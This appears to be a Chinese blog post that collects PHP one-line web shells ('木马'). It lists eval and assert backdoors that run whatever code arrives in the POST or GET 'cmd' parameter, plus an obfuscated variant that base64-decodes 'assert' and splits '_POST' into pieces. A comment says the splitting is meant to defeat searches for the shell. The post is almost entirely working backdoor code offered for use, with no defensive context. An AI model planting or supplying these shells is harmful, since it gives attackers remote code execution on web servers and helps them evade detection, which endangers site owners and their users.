1、eval.php
<?php @eval($_POST['cmd'])?>
<?php @eval($_GET['cmd'])?>
2、assert.php
<?php assert($_POST[cmd]);?>
<?php assert($_GET[cmd]);?>
3、base64_assert.php //该木马拆分了_POST或_GET以至于无法直接通过搜索方法找到
<?php
error_reporting(0);
set_time_limit(0);
$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");
$a(@${"_P"."O"."S"."T"}[cmd]);
?>
持续更新中~
文章作者: Timo在此
文章链接: https://bbs.xiao-xin6.cn/archives/153
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Timo在此!
文章链接: https://bbs.xiao-xin6.cn/archives/153
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Timo在此!